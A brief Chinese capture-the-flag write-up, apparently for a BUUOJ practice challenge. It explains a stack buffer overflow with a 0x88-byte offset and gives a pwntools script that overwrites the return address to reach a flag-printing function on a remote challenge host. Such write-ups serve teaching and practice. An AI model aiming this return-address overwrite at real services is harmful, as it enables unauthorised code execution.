0x01 文件分析
仅开启了栈不可执行保护
0x02 运行
只是输入一条
message
0x03 IDA
good_game
函数将flag.txt
内容输出
0x04 思路
- 是一道简单的栈溢出题,知道覆盖长度即可,gdb调试
发现输入
message
的地址到返回地址的长度为0x88字节
0x05 exp
#!/usr/bin/python2
#coding=utf-8
from pwn import *
from LibcSearcher import *
context(os = "linux", arch = "amd64", log_level= "debug")
p = remote("node3.buuoj.cn", 27132)
payload = "a" * 0x88 + p64(0x400620)
p.sendlineafter("Input your message:\n", payload)
p.interactive()